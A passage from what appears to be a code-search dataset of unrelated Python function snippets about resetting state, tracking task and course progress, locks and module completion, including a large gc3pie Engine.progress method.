= StudentModule.objects.get(\r\n student_id=student.id,\r\n course_id=course_id,\r\n module_state_key=module_state_key\r\n )\r\n\r\n if delete_module:\r\n module_to_reset.delete()\r\n else:\r\n _reset_module_attempts(module_to_reset)", "def check_prerequisites(self):\n self.courses_not_completed = self.prerequisite_set - set(self.user_courses.keys())", "def test_recalculate_progress(self):\n self._build_sample_graph()\n self._create_lessons() # 3 lessons in unit 1\n self.student = models.Student(user_id='1')\n self._create_linear_progress() # Lesson 1 and 2 completed\n self.lesson1.properties[SKILLS_KEY] = [self.sa.id]\n self.lesson2.properties[SKILLS_KEY] = [self.sb.id]\n self.lesson3.properties[SKILLS_KEY] = [self.sa.id,\n self.sc.id]\n 
self.course.save()\n\n tracker = SkillCompletionTracker(self.course)\n lprogress_tracker = UnitLessonCompletionTracker(self.course)\n lprogress = lprogress_tracker.get_or_create_progress(self.student)\n expected = {\n self.sa: tracker.IN_PROGRESS,\n self.sb: tracker.COMPLETED,\n self.sc: tracker.NOT_ATTEMPTED\n }\n for skill, expected_progress in expected.iteritems():\n self.assertEqual(expected_progress,\n tracker.recalculate_progress(lprogress_tracker,\n lprogress, skill))", "def set_task_in_progress(self):\n\n tasks = self._get_all_tasks()\n\n task_id = tasks[self.tasks_view.currentRow()].Id\n\n self.tasks_flow.set_status(task_id, 1)\n\n # Refresh the table\n self.write_tasks_table()", "def test_progress(self):\n # A requires a certain object in inventory\n self._fulfillA()\n self.character.quests.progress()\n self.assertEqual(self._get_quest().current_step, \"B\")\n\n # B requires progress be called with specific kwarg\n # should not step (no kwarg)\n self.character.quests.progress()\n self.assertEqual(self._get_quest().current_step, \"B\")\n\n # should step (kwarg sent)\n self.character.quests.progress(complete_quest_B=True)\n self.assertEqual(self._get_quest().current_step, \"C\")\n\n # C requires a counter Attribute on char be high enough\n self._fulfillC()\n self.character.quests.progress()\n self.assertEqual(self._get_quest().current_step, \"C\") # still on last step\n self.assertEqual(self._get_quest().is_completed, True)", "def reset_student_attempts(request, course_id):\r\n course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)\r\n course = get_course_with_access(\r\n request.user, 'staff', course_id, depth=None\r\n )\r\n\r\n problem_to_reset = strip_if_string(request.GET.get('problem_to_reset'))\r\n student_identifier = request.GET.get('unique_student_identifier', None)\r\n student = None\r\n if student_identifier is not None:\r\n student = get_student_from_identifier(student_identifier)\r\n all_students = request.GET.get('all_students', False) in ['true', 'True', True]\r\n delete_module = request.GET.get('delete_module', False) in ['true', 'True', True]\r\n\r\n # parameter combinations\r\n if all_students and student:\r\n return HttpResponseBadRequest(\r\n \"all_students and unique_student_identifier are mutually exclusive.\"\r\n )\r\n if all_students and delete_module:\r\n return HttpResponseBadRequest(\r\n \"all_students and delete_module are mutually exclusive.\"\r\n )\r\n\r\n # instructor authorization\r\n if all_students or delete_module:\r\n if not has_access(request.user, 'instructor', course):\r\n return HttpResponseForbidden(\"Requires instructor access.\")\r\n\r\n try:\r\n module_state_key = course_id.make_usage_key_from_deprecated_string(problem_to_reset)\r\n except InvalidKeyError:\r\n return HttpResponseBadRequest()\r\n\r\n response_payload = {}\r\n response_payload['problem_to_reset'] = problem_to_reset\r\n\r\n if student:\r\n try:\r\n enrollment.reset_student_attempts(course_id, student, module_state_key, delete_module=delete_module)\r\n except StudentModule.DoesNotExist:\r\n return HttpResponseBadRequest(_(\"Module does not exist.\"))\r\n except sub_api.SubmissionError:\r\n # Trust the submissions API to log the error\r\n error_msg = _(\"An error occurred while deleting the score.\")\r\n return HttpResponse(error_msg, status=500)\r\n response_payload['student'] = student_identifier\r\n elif all_students:\r\n instructor_task.api.submit_reset_problem_attempts_for_all_students(request, module_state_key)\r\n response_payload['task'] = 'created'\r\n 
response_payload['student'] = 'All Students'\r\n else:\r\n return HttpResponseBadRequest()\r\n\r\n return JsonResponse(response_payload)", "def update_waiting(self):\n if self.get_value(0) is None:\n self.set_value(False, 0)\n else:\n self.set_value(bool(self.get_value(0)), 0)\n self.state = ACTIVE", "def reset_task_state(self, message=\"\"):\r\n info_message = \"Combined open ended user state for user {0} in location {1} was invalid. It has been reset, and you now have a new attempt. {2}\".format(self.system.anonymous_student_id, self.location.to_deprecated_string(), message)\r\n self.current_task_number = 0\r\n self.student_attempts = 0\r\n self.old_task_states.append(self.task_states)\r\n self.task_states = []\r\n log.info(info_message)", "def reset(self):\r\n\t\tself.player_selected_actions = np.zeros((self.num_actions,), int)\r\n\t\tself.player_reward = np.zeros((self.num_timesteps,))\r\n\t\tself.player_optimum = np.zeros_like(self.player_reward, dtype=int)", "def backfill (self):\n mods = self.get_mods_instance()\n # if self.verbose:\n # print 'BEFORE'\n # mods.show_notes()\n try:\n mods.do_back_fill(self.award_ids)\n # print mods\n # print 'AFTER'\n # mods.show_notes()\n except:\n print 'ERROR: {}'.format(sys.exc_info()[1])\n traceback.print_exc()", "def setLocked(self, value):\n for attr in self._filter():\n attr.setLocked(value)", "def calculations(self):\n self.prerequisite_set = get_prerequisites(self.major, self.major2)\n self.check_prerequisites()\n self.get_requirements_for_majors()", "def test_enable_section_by_progress_linear_flow(self):\n\n self.launchSurvey(\"test_progress_value_source_section_enabled_no_hub\")\n\n self.assertInBody(\"Section 1 Question 1\")\n self.post({\"s1-b1-q1-a1\": 1})\n\n self.assertInBody(\"Section 1 Question 2\")\n self.post({\"s1-b2-q1-a1\": 1})\n\n self.assertInBody(\"Section 2 Question 1\")\n self.post({\"s2-b1-q1-a1\": 1})", "def spinlocks(self, spinlocks):\n\n self._spinlocks = spinlocks", "def check_requirements(self):\n # first, separate plugins based on those with and without dependeices.\n remaining = set()\n loaded = set()\n\n for k, v in self.modules.items():\n if v.requirements:\n remaining.add(v)\n else:\n loaded.add(k)\n self.module_call_order.append(v)\n\n for r in remaining:\n # first we check to make sure that all dependencies are satisfied.\n if not self.dependencies_satisfied(r):\n raise Exception(f\"Oops! Module {r} is not satisfied! It desires: {r.requirements}\")\n\n # now confident that all versions check out, arrange the plugins into a suitable load order.\n # no reason to do anything fancy without requirements though.\n if not remaining:\n return\n\n while True:\n new_remaining = remaining.copy()\n for m in remaining:\n if loaded.issuperset({r for r in m.requirements.keys()}):\n new_remaining.remove(m)\n loaded.add(m.name)\n self.module_call_order.append(m)\n if len(new_remaining) < len(remaining):\n # this is good.. we made progress!\n remaining = new_remaining\n if not remaining:\n # hooray! No more plugins to process\n break\n else:\n # this is bad. 
we are not making progress.\n raise Exception(\"dependency load order is not progressing!\")", "def reset(self):\n self.num_steps = 0\n self.world_state = self.action = None", "def do_workload(self):\n module_manager = self._core.get_module_manager()\n module = module_manager.get_module_by_name(self._values[\"name\"])\n module_manager.update_module(module)", "def update_task_progress():\r\n current_time = datetime.now(UTC)\r\n progress = {\r\n 'action_name': action_name,\r\n 'attempted': num_attempted,\r\n 'succeeded': num_succeeded,\r\n 'failed': num_failed,\r\n 'total': num_total,\r\n 'duration_ms': int((current_time - start_time).total_seconds() * 1000),\r\n 'step': curr_step,\r\n }\r\n _get_current_task().update_state(state=PROGRESS, meta=progress)\r\n\r\n return progress", "def action_locked_temporarily(self, cr, uid, ids, context=None):\n if self.pool.get('account.period').search(cr, uid, [('state','=','draft'),('fiscalyear_id','in',ids)], context=context):\n raise orm.except_orm(_('Error'), _('You Must Close Open Periods First'))\n return self.write(cr, uid, ids, {'state': 'locked_temp'}, context=context)", "def reset_modules(self) -> None:\n self.modules = {}\n self.update_modules()\n self.parse_modules()", "def _reset(self):\n if self.mode not in ['auto', 'min', 'max']:\n warnings.warn(\n 'Learning rate reduction mode %s is unknown, '\n 'fallback to auto mode.' % self.mode\n )\n self.mode = 'auto'\n if self.mode == 'min' or (\n self.mode == 'auto' and 'acc' not in self.monitor\n ):\n self.monitor_op = lambda a, b: np.less(a, b - self.min_delta)\n self.best = np.Inf\n else:\n self.monitor_op = lambda a, b: np.greater(a, b + self.min_delta)\n self.best = -np.Inf\n self.cooldown_counter = 0\n self.wait = 0", "def clear_user_module_score(self, user):\r\n self.set_user_module_score(user, None, None)", "def reset(self):\n self.dict_lock.acquire()\n self.list_lock.acquire()\n\n self.beginResetModel()\n self.levels_dict = {}\n self.view_list = []\n self.endResetModel()\n \n self.list_lock.release()\n self.dict_lock.release()", "def reset_status(self):\r\n self.ship_left = self.ai_settings.ship_limit\r\n self.score = 0\r\n self.level = 1", "def _setProgress(self):\n\n self.progress = (self.iteration, self.iterationCount)", "def complete(self, **kwargs):\n response = self._requester.request(\n \"PUT\",\n \"courses/{}/modules/{}/items/{}/done\".format(\n self.course_id, self.module_id, self.id\n ),\n _kwargs=combine_kwargs(**kwargs),\n )\n module_item_json = response.json()\n module_item_json.update({\"course_id\": self.course_id})\n\n return ModuleItem(self._requester, module_item_json)", "def progressions(self, progressions):\n\n self._progressions = progressions", "def progressions(self, progressions):\n\n self._progressions = progressions", "def f_unlock(self):\n self._locked = False", "def reset_update_lock(self):\n self.lock = False\n self.last_lock_time = None", "def reset(self):\n self.state = EvaluationState.ready\n\n for child in self.children:\n if hasattr(child, \"reset\"):\n child.reset()", "def lock (self):\n self.locked = True\n self._changed = False", "def incAvailProcSlots(self):\n\n\t\t# Acquire a lock\n\t\tself.lock()\n\n\t\t# Read number of currently executing processes\n\t\tc0 = self.getAvailProcSlots()\n\n\t\tc1 = c0 + 1\n\t\tself.lockfile.seek(0)\n\t\tself.lockfile.write('%04d\\n' % c1)\n\t\tself.lockfile.flush()\n\t\t# Unlock semaphore\n\t\tself.unlock()", "def mod_complete(self):\n raise NotImplementedError(\"Mod complete isn't overriden\")", "def 
resetDefences(self):\n self.currentAP = self.maxAP\n self.currentSP = self.maxSP", "def perform_module_state_update(update_fcn, filter_fcn, _entry_id, course_id, task_input, action_name):\r\n # get start time for task:\r\n start_time = time()\r\n\r\n usage_key = course_id.make_usage_key_from_deprecated_string(task_input.get('problem_url'))\r\n student_identifier = task_input.get('student')\r\n\r\n # find the problem descriptor:\r\n module_descriptor = modulestore().get_item(usage_key)\r\n\r\n # find the module in question\r\n modules_to_update = StudentModule.objects.filter(course_id=course_id, module_state_key=usage_key)\r\n\r\n # give the option of updating an individual student. If not specified,\r\n # then updates all students who have responded to a problem so far\r\n student = None\r\n if student_identifier is not None:\r\n # if an identifier is supplied, then look for the student,\r\n # and let it throw an exception if none is found.\r\n if \"@\" in student_identifier:\r\n student = User.objects.get(email=student_identifier)\r\n elif student_identifier is not None:\r\n student = User.objects.get(username=student_identifier)\r\n\r\n if student is not None:\r\n modules_to_update = modules_to_update.filter(student_id=student.id)\r\n\r\n if filter_fcn is not None:\r\n modules_to_update = filter_fcn(modules_to_update)\r\n\r\n # perform the main loop\r\n num_attempted = 0\r\n num_succeeded = 0\r\n num_skipped = 0\r\n num_failed = 0\r\n num_total = modules_to_update.count()\r\n\r\n def get_task_progress():\r\n \"\"\"Return a dict containing info about current task\"\"\"\r\n current_time = time()\r\n progress = {'action_name': action_name,\r\n 'attempted': num_attempted,\r\n 'succeeded': num_succeeded,\r\n 'skipped': num_skipped,\r\n 'failed': num_failed,\r\n 'total': num_total,\r\n 'duration_ms': int((current_time - start_time) * 1000),\r\n }\r\n return progress\r\n\r\n task_progress = get_task_progress()\r\n _get_current_task().update_state(state=PROGRESS, meta=task_progress)\r\n for module_to_update in modules_to_update:\r\n num_attempted += 1\r\n # There is no try here: if there's an error, we let it throw, and the task will\r\n # be marked as FAILED, with a stack trace.\r\n with dog_stats_api.timer('instructor_tasks.module.time.step', tags=[u'action:{name}'.format(name=action_name)]):\r\n update_status = update_fcn(module_descriptor, module_to_update)\r\n if update_status == UPDATE_STATUS_SUCCEEDED:\r\n # If the update_fcn returns true, then it performed some kind of work.\r\n # Logging of failures is left to the update_fcn itself.\r\n num_succeeded += 1\r\n elif update_status == UPDATE_STATUS_FAILED:\r\n num_failed += 1\r\n elif update_status == UPDATE_STATUS_SKIPPED:\r\n num_skipped += 1\r\n else:\r\n raise UpdateProblemModuleStateError(\"Unexpected update_status returned: {}\".format(update_status))\r\n\r\n # update task status:\r\n task_progress = get_task_progress()\r\n _get_current_task().update_state(state=PROGRESS, meta=task_progress)\r\n\r\n return task_progress", "def reset(self):\n # The apply(f) method recursively calls f on itself and all children\n self.apply(self._reset_module)", "def set_task_not_started(self):\n\n tasks = self._get_all_tasks()\n\n task_id = tasks[self.tasks_view.currentRow()].Id\n\n self.tasks_flow.set_status(task_id, 2)\n\n # Refresh the table\n self.write_tasks_table()", "def reset(self, init_pt=0):\n self._pid_lock.acquire() # Acquire Lock\n\n self._error_sum = 0\n self._delta_error = 0\n self._curr_err = init_pt - self._goal\n\n 
self._prev_error_time = time.time()\n\n self._pid_lock.release() # Release Lock", "def setProgress(self, progress):\n\t\tself.config.PROGRESS = [progress]", "def reset_solver(self):\n self.total_iterations = 0\n self.active_constraints_index = 0\n self.active_constraints_set = False\n return", "def reset() -> None:\n Invocation.active = {}\n Invocation.current = None # type: ignore\n Invocation.top = Invocation(None, None)\n Invocation.top._become_current() # pylint: disable=protected-access\n Invocation.up_to_date = {}\n Invocation.phony = set()\n Invocation.poisoned = set()\n Invocation.actions_count = 0\n Invocation.skipped_count = 0", "def reset(self):\n self._value_estimates[:] = self.prior\n self.action_attempts[:] = 0\n self.last_action = None\n self.t = 0", "def setXLocked( self, state = True ):\n self._xLocked = state", "def status_assignee_reset(self):\n self.assigned_to = None\n self.status = 'new'\n self.primary_statute = None", "def test_get_progress(self):\r\n self.combinedoe.update_task_states()\r\n self.combinedoe.state = \"done\"\r\n self.combinedoe.is_scored = True\r\n progress = self.combinedoe.get_progress()\r\n self.assertIsInstance(progress, Progress)\r\n\r\n # progress._a is the score of the xmodule, which is 0 right now.\r\n self.assertEqual(progress._a, 0)\r\n\r\n # progress._b is the max_score (which is 1), divided by the weight (which is 1).\r\n self.assertEqual(progress._b, 1)", "def deny(self):\n self.quest_node['completed_by'] = ''\n self.completed_by = None\n self.active = True\n self.quest_node['active'] = True\n graph.push(self.quest_node)", "def _reset_module(m):\n raise NotImplementedError", "def resetSettings(self):\n\n # it does this 4 times because for some reason it would not grab everything one time through. Investigate\n for i in range(4):\n\n networkNode = self.returnNetworkNode\n attrs = cmds.listAttr(networkNode, ud=True)\n\n for attr in attrs:\n attrType = str(cmds.getAttr(networkNode + \".\" + attr, type=True))\n\n if attrType == \"double\":\n cmds.setAttr(networkNode + \".\" + attr, lock=False)\n cmds.setAttr(networkNode + \".\" + attr, 0, lock=True)\n\n if attrType == \"bool\":\n cmds.setAttr(networkNode + \".\" + attr, lock=False)\n cmds.setAttr(networkNode + \".\" + attr, True, lock=True)\n\n if attrType == \"enum\":\n cmds.setAttr(networkNode + \".\" + attr, lock=False)\n cmds.setAttr(networkNode + \".\" + attr, 0, lock=True)\n\n # relaunch the UI\n self.updateSettingsUI()\n self.applyModuleChanges(self)", "def _reset(self):\n if self.mode not in ['auto', 'min', 'max']:\n warnings.warn('Learning Rate Plateau Reducing mode %s is unknown, '\n 'fallback to auto mode.' 
% (self.mode),\n RuntimeWarning)\n self.mode = 'auto'\n if (self.mode == 'min' or\n (self.mode == 'auto' and 'acc' not in self.monitor)):\n self.monitor_op = lambda a, b: np.less(a, b - self.min_delta)\n self.best = np.Inf\n else:\n self.monitor_op = lambda a, b: np.greater(a, b + self.min_delta)\n self.best = -np.Inf\n self.cooldown_counter = 0\n self.wait = 0", "def percent_acquired(self, percent_acquired):\n\n self._percent_acquired = percent_acquired", "def specific_reset(self) -> None:\n self.agent.specific_reset() # reset joints\n new_pos = self.agent.init_xyz\n new_pos[:2] = np.random.uniform(-0.01, 0.01, 2)\n self.agent.set_position(new_pos)\n self.old_potential = self.calculate_task_potential()", "def reset_step(self):\n # reset all levels\n for l in self.levels:\n l.reset_level()", "def modifyNotValuableComponents(self):\n # Nothing to do\n pass", "def uncomplete(self, **kwargs):\n response = self._requester.request(\n \"DELETE\",\n \"courses/{}/modules/{}/items/{}/done\".format(\n self.course_id, self.module_id, self.id\n ),\n _kwargs=combine_kwargs(**kwargs),\n )\n module_item_json = response.json()\n module_item_json.update({\"course_id\": self.course_id})\n\n return ModuleItem(self._requester, module_item_json)", "def reset(self):\r\n # TODO: have reset flag such that it forces all the bottom changes\r\n self.pwm_freq = self._default[\"pwm_freq\"]\r\n self.gate_logic = self._default[\"gate_logic\"]\r\n self.max_pwm = self._default[\"max_pwm\"]\r\n self.lase_on_power_up = self._default[\"lase_on_power_up\"]\r\n\r\n self.mode = self._default[\"mode\"]\r\n self.lase = self._default[\"lase\"]\r\n self.percent = self._default[\"percent\"] # in percent\r", "def test_reset_attempts_on_problem(self):\r\n # get descriptor:\r\n problem_url_name = 'H1P1'\r\n self.define_option_problem(problem_url_name)\r\n location = InstructorTaskModuleTestCase.problem_location(problem_url_name)\r\n descriptor = self.module_store.get_item(location)\r\n num_attempts = 3\r\n # first store answers for each of the separate users:\r\n for _ in range(num_attempts):\r\n for username in self.userlist:\r\n self.submit_student_answer(username, problem_url_name, [OPTION_1, OPTION_1])\r\n\r\n for username in self.userlist:\r\n self.assertEquals(self.get_num_attempts(username, descriptor), num_attempts)\r\n\r\n self.reset_problem_attempts('instructor', location)\r\n\r\n for username in self.userlist:\r\n self.assertEquals(self.get_num_attempts(username, descriptor), 0)", "def progress(self):\n # prepare\n currently_submitted = 0\n currently_in_flight = 0\n # pylint: disable=redefined-variable-type\n if self.max_in_flight > 0:\n limit_in_flight = self.max_in_flight\n else:\n limit_in_flight = utils.PlusInfinity()\n if self.max_submitted > 0:\n limit_submitted = self.max_submitted\n else:\n limit_submitted = utils.PlusInfinity()\n\n # if no resources are enabled, there's no point in running\n # this further\n nr_enabled_resources = sum(int(rsc.enabled)\n for rsc in self._core.resources.itervalues())\n if nr_enabled_resources == 0:\n raise gc3libs.exceptions.NoResources(\n \"No resources available for running jobs.\")\n\n # update status of SUBMITTED/RUNNING tasks before launching\n # new ones, otherwise we would be checking the status of\n # some tasks twice...\n transitioned = []\n for index, task in enumerate(self._in_flight):\n try:\n old_state = task.execution.state\n self._core.update_job_state(task)\n if self._store and task.changed:\n self._store.save(task)\n state = task.execution.state\n if state != 
old_state:\n self.__update_task_counts(task, old_state, -1)\n self.__update_task_counts(task, state, +1)\n if state == Run.State.SUBMITTED:\n # only real applications need to be counted\n # against the limit; policy tasks are exempt\n # (this applies to all similar clause below)\n if isinstance(task, Application):\n currently_submitted += 1\n currently_in_flight += 1\n # elif state == Run.State.RUNNING or state ==\n # Run.State.UNKNOWN:\n elif state == Run.State.RUNNING:\n if isinstance(task, Application):\n currently_in_flight += 1\n if self.can_retrieve and self.retrieve_running:\n # try to get output\n try:\n self._core.fetch_output(\n task,\n overwrite=self.retrieve_overwrites,\n changed_only=self.retrieve_changed_only)\n # pylint: disable=broad-except\n except Exception as err:\n if gc3libs.error_ignored(\n # context:\n # - module\n 'core',\n # - class\n 'Engine',\n # - method\n 'progress',\n # - actual error class\n err.__class__.__name__,\n # - additional keywords\n 'RUNNING',\n 'fetch_output',\n ):\n gc3libs.log.error(\n \"Ignored error in fetching output of\"\n \" RUNNING task '%s': %s: %s\",\n task, err.__class__.__name__, err)\n gc3libs.log.debug(\n \"(Original traceback follows.)\",\n exc_info=True)\n else:\n # propagate exceptions for debugging purposes\n raise\n elif state == Run.State.STOPPED:\n # task changed state, mark as to remove\n transitioned.append(index)\n self._stopped.append(task)\n elif state == Run.State.TERMINATING:\n # task changed state, mark as to remove\n transitioned.append(index)\n self._terminating.append(task)\n elif state == Run.State.TERMINATED:\n # task changed state, mark as to remove\n transitioned.append(index)\n self._terminated.append(task)\n else:\n # if we got to this point, state has an invalid value\n gc3libs.log.error(\n \"Invalid state '%r' returned by task %s.\",\n state, task)\n if not gc3libs.error_ignored(\n # context:\n # - module\n 'core',\n # - class\n 'Engine',\n # - method\n 'progress',\n # - actual error class\n 'InternalError',\n # - additional keywords\n 'state',\n 'update',\n ):\n # propagate exception to caller\n raise gc3libs.exceptions.InternalError(\n \"Invalid state '{state!r}' returned by task {task}\"\n .format(state=state, task=task))\n except gc3libs.exceptions.ConfigurationError:\n # Unrecoverable; no sense in continuing -- pass\n # immediately on to client code and let it handle\n # this...\n raise\n # pylint: disable=broad-except\n except Exception as err:\n if gc3libs.error_ignored(\n # context:\n # - module\n 'core',\n # - class\n 'Engine',\n # - method\n 'progress',\n # - actual error class\n err.__class__.__name__,\n # - additional keywords\n 'state',\n 'update',\n ):\n gc3libs.log.error(\n \"Ignoring error in updating state of task '%s':\"\n \" %s: %s\",\n task,\n err.__class__.__name__,\n err,\n exc_info=True)\n else:\n # propagate exception to caller\n raise\n # remove tasks that transitioned to other states\n for index in reversed(transitioned):\n del self._in_flight[index]\n\n # execute kills and update count of submitted/in-flight tasks\n transitioned = []\n for index, task in enumerate(self._to_kill):\n try:\n old_state = task.execution.state\n self._core.kill(task)\n if self._store:\n self._store.save(task)\n state = task.execution.state\n if state != old_state:\n self.__update_task_counts(task, old_state, -1)\n self.__update_task_counts(task, state, +1)\n if old_state == Run.State.SUBMITTED:\n if isinstance(task, Application):\n currently_submitted -= 1\n currently_in_flight -= 1\n elif old_state == 
Run.State.RUNNING:\n if isinstance(task, Application):\n currently_in_flight -= 1\n self._terminated.append(task)\n transitioned.append(index)\n # pylint: disable=broad-except\n except Exception as err:\n if gc3libs.error_ignored(\n # context:\n # - module\n 'core',\n # - class\n 'Engine',\n # - method\n 'progress',\n # - actual error class\n err.__class__.__name__,\n # - additional keywords\n 'kill'\n ):\n gc3libs.log.error(\n \"Ignored error in killing task '%s': %s: %s\",\n task, err.__class__.__name__, err)\n # print again with traceback info at a higher log level\n gc3libs.log.debug(\n \"(Original traceback follows.)\",\n exc_info=True)\n else:\n # propagate exceptions for debugging purposes\n raise\n # remove tasks that transitioned to other states\n for index in reversed(transitioned):\n del self._to_kill[index]\n\n # update state of STOPPED tasks; again need to make before new\n # submissions, because it can alter the count of in-flight\n # tasks.\n transitioned = []\n for index, task in enumerate(self._stopped):\n try:\n old_state = task.execution.state\n self._core.update_job_state(task)\n if self._store and task.changed:\n self._store.save(task)\n state = task.execution.state\n if state != old_state:\n self.__update_task_counts(task, old_state, -1)\n self.__update_task_counts(task, state, +1)\n if state in [Run.State.SUBMITTED, Run.State.RUNNING]:\n if isinstance(task, Application):\n currently_in_flight += 1\n if task.execution.state == Run.State.SUBMITTED:\n currently_submitted += 1\n self._in_flight.append(task)\n # task changed state, mark as to remove\n transitioned.append(index)\n elif state == Run.State.TERMINATING:\n self._terminating.append(task)\n # task changed state, mark as to remove\n transitioned.append(index)\n elif state == Run.State.TERMINATED:\n self._terminated.append(task)\n # task changed state, mark as to remove\n transitioned.append(index)\n # pylint: disable=broad-except\n except Exception as err:\n if gc3libs.error_ignored(\n # context:\n # - module\n 'core',\n # - class\n 'Engine',\n # - method\n 'progress',\n # - actual error class\n err.__class__.__name__,\n # - additional keywords\n 'state',\n 'update',\n 'STOPPED',\n ):\n gc3libs.log.error(\n \"Ignoring error in updating state of\"\n \" STOPPED task '%s': %s: %s\",\n task, err.__class__.__name__, err,\n exc_info=True)\n else:\n # propagate exception to caller\n raise\n # remove tasks that transitioned to other states\n for index in reversed(transitioned):\n del self._stopped[index]\n\n # now try to submit NEW tasks\n # gc3libs.log.debug(\"Engine.progress: submitting new tasks [%s]\"\n # % str.join(', ', [str(task) for task in self._new]))\n transitioned = []\n if (self.can_submit and\n currently_submitted < limit_submitted and\n currently_in_flight < limit_in_flight):\n # update state of all enabled resources, to give a chance to\n # all to get a new job; for a complete discussion, see:\n # https://github.com/uzh/gc3pie/issues/485\n self._core.update_resources()\n # now try to submit\n with self.scheduler(self._new,\n self._core.resources.values()) as _sched:\n # wrap the original generator object so that `send`\n # and `throw` do not yield a value -- we only get new\n # stuff from the call to the `next` method in the `for\n # ... 
in schedule` line.\n sched = gc3libs.utils.YieldAtNext(_sched)\n for task_index, resource_name in sched:\n task = self._new[task_index]\n resource = self._core.resources[resource_name]\n # try to submit; go to SUBMITTED if successful,\n # FAILED if not\n try:\n self._core.submit(task, targets=[resource])\n if self._store:\n self._store.save(task)\n # XXX: can remove the following assert when\n # we're sure Issue 419 is fixed\n assert task_index not in transitioned\n self._in_flight.append(task)\n transitioned.append(task_index)\n if isinstance(task, Application):\n currently_submitted += 1\n currently_in_flight += 1\n # if we get to this point, we know state is not NEW anymore\n state = task.execution.state\n self.__update_task_counts(task, Run.State.NEW, -1)\n self.__update_task_counts(task, state, +1)\n\n sched.send(task.execution.state)\n # pylint: disable=broad-except\n except Exception as err1:\n # record the error in the task's history\n task.execution.history(\n \"Submission to resource '%s' failed: %s: %s\" %\n (resource.name,\n err1.__class__.__name__,\n str(err1)))\n gc3libs.log.error(\n \"Got error in submitting task '%s', informing\"\n \" scheduler: %s: %s\",\n task,\n err1.__class__.__name__,\n str(err1))\n # inform scheduler and let it handle it\n try:\n sched.throw(* sys.exc_info())\n # pylint: disable=broad-except\n except Exception as err2:\n if gc3libs.error_ignored(\n # context:\n # - module\n 'core',\n # - class\n 'Engine',\n # - method\n 'progress',\n # - actual error class\n err2.__class__.__name__,\n # - additional keywords\n 'scheduler',\n 'submit',\n ):\n gc3libs.log.debug(\n \"Ignored error in submitting task '%s':\"\n \" %s: %s\",\n task,\n err2.__class__.__name__,\n err2,\n exc_info=True)\n else:\n # propagate exceptions for debugging purposes\n raise\n # enforce Engine limits\n if (currently_submitted >= limit_submitted\n or currently_in_flight >= limit_in_flight):\n break\n # remove tasks that transitioned to SUBMITTED state\n for index in reversed(transitioned):\n del self._new[index]\n\n # finally, retrieve output of finished tasks\n if self.can_retrieve:\n transitioned = []\n for index, task in enumerate(self._terminating):\n # try to get output\n try:\n self._core.fetch_output(\n task,\n overwrite=self.retrieve_overwrites,\n changed_only=self.retrieve_changed_only)\n except gc3libs.exceptions.UnrecoverableDataStagingError as ex:\n gc3libs.log.error(\n \"Error in fetching output of task '%s',\"\n \" will mark it as TERMINATED\"\n \" (with error exit code %d): %s: %s\",\n task, posix.EX_IOERR,\n ex.__class__.__name__, str(ex), exc_info=True)\n task.execution.returncode = (\n Run.Signals.DataStagingFailure,\n posix.EX_IOERR)\n task.execution.state = Run.State.TERMINATED\n task.changed = True\n # pylint: disable=broad-except\n except Exception as ex:\n if gc3libs.error_ignored(\n # context:\n # - module\n 'core',\n # - class\n 'Engine',\n # - method\n 'progress',\n # - actual error class\n ex.__class__.__name__,\n # - additional keywords\n 'fetch_output',\n ):\n gc3libs.log.debug(\n \"Ignored error in fetching output of task '%s':\"\n \" %s: %s\",\n task,\n ex.__class__.__name__,\n ex)\n gc3libs.log.debug(\n \"(Original traceback follows.)\",\n exc_info=True)\n else:\n # propagate exceptions for debugging purposes\n raise\n\n for index, task in enumerate(self._terminating):\n if task.execution.state == Run.State.TERMINATED:\n transitioned.append(index)\n try:\n self._core.free(task)\n # update counts\n self.__update_task_counts(task, Run.State.TERMINATING, 
-1)\n self.__update_task_counts(task, Run.State.TERMINATED, +1)\n # pylint: disable=broad-except\n except Exception as err:\n gc3libs.log.error(\n \"Got error freeing up resources used by task '%s': %s: %s.\"\n \" (For cloud-based resources, it's possible that the VM\"\n \" has been destroyed already.)\",\n task, err.__class__.__name__, err)\n if self.forget_terminated:\n try:\n self.remove(task)\n except Exception as err:\n gc3libs.log.debug(\n \"Could not remove task '%s': %s: %s\",\n task, err.__class__.__name__, err)\n else:\n self._terminated.append(task)\n\n if self._store and task.changed:\n self._store.save(task)\n # remove tasks for which final output has been retrieved\n for index in reversed(transitioned):\n del self._terminating[index]", "def updateMutexProposition(self):\n currentLayerPropositions = self.propositionLayer.getPropositions()\n currentLayerMutexActions = self.actionLayer.getMutexActions()\n for prop1 in currentLayerPropositions:\n for prop2 in currentLayerPropositions:\n if prop1 == prop2:\n continue\n if mutexPropositions(prop1, prop2, currentLayerMutexActions):\n self.propositionLayer.addMutexProp(prop1, prop2)", "def apply_pending_updates_if_available(self):\n if self.path_exists(self._module) and 'next' in os.listdir(self._module):\n if '.version' in os.listdir(self.get_module_and_path('next')):\n pending_update_version = self.get_version(self.get_module_and_path('next'))\n print('Pending update found: ', pending_update_version)\n if self.path_exists(self.get_module_and_path(self._main_dir)):\n self.rmtree(self.get_module_and_path(self._main_dir)) # Remove the 'main' directory and contents.\n os.rename(self.get_module_and_path('next'), self.get_module_and_path(self._main_dir)) # Move the 'next' to 'main'\n print('Update applied (', pending_update_version, '), ready to rock and roll')\n else:\n print('Corrupt pending update found, discarding...')\n self.rmtree(self.get_module_and_path('next'))\n else:\n print('No pending update found')", "def reset(self):\n # from pathlib import Path\n # import pickle as pkl\n # path_traj = Path.home() / 'TmrlData' / 'reward' / 'traj.pkl'\n # with open(path_traj, 'wb') as file_traj:\n # pkl.dump(self.traj, file_traj)\n\n self.cur_idx = 0\n self.step_counter = 0\n self.failure_counter = 0\n\n # self.traj = []", "def reset() -> None:\n RwLocks.by_name = {}\n RwLocks.lockers = {}", "def reset(self):\r\n self.progress = self._get_progress(self.start)\r\n return self", "def start_missions(self, farm_shifter_bios=False):\n logger.info(f\"{self.mode_name}: {self.stages} stages available.\")\n if self.stages > 0:\n self.game.select_mode(self.mode_name)\n stage_1_num, stage_2_num = self.separate_stages\n logger.info(f\"{self.mode_name}: available stages: {stage_1_num} and {stage_2_num}\")\n if stage_1_num + stage_2_num > self.stages:\n logger.debug(f\"Stages count {self.stages} is lesser than available stages. 
